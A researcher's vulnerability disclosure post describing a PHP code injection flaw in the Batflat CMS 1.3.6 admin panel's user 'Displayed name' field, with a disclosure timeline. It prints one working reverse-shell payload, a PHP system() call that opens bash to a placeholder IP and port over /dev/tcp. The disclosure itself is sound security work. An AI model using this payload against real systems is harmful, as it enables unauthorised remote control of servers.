During my security research I came across a CMS called Batflat. I have decided to install its latest version locally (1.3.6 at the time of writing) and try to break it. The tests have revealed a PHP code injection vulnerability that could lead to Remote Code Execution in the admin panel. I have contacted the developers, so that they could patch it, but what I’ve learnt was that they have stopped the development of the software and the source code has been released to the users for modifications. My next step was creating a GitHub issue in the official repository of the software, but since it has not received any attention, I have decided to publicly disclose the vulnerability.
While browsing through the panes of Batflat’s administration panel, I came across “Users” tab which allowed for editing or adding new users in the system. I’ve tried a simple PHP code in the “Displayed name” input to test whether the code will execute – which it has without any problems.
The next step I’ve taken to exploit this vulnerability was to check if PHP functions that are capable of executing operating system commands are not blocked, so I’ve tried injecting a simple PHP code, which prints the current working directory.
This has produced the following result:
Last thing needed to be done was to prepare a payload that would have executed a reverse shell connection to the attacking machine. Since the way the code was injected into the application was straightforward, no fancy character escaping or filter bypassing was needed and basic reverse shell payload could be used.
<?php system(“/bin/bash -c ‘bash -i >& /dev/tcp/<IP>/<PORT> 0>&1′”);?>
I have also created a full Proof-of-Concept exploit script, that automates the whole process, which can be found under this link:
- 27/12/2020 – Vulnerability identification, contacting the developers,
- 15/01/2021 – Developer response,
- 20/01/2021 – Creation of GitHub issue,
- 15/02/2021 – Public disclosure.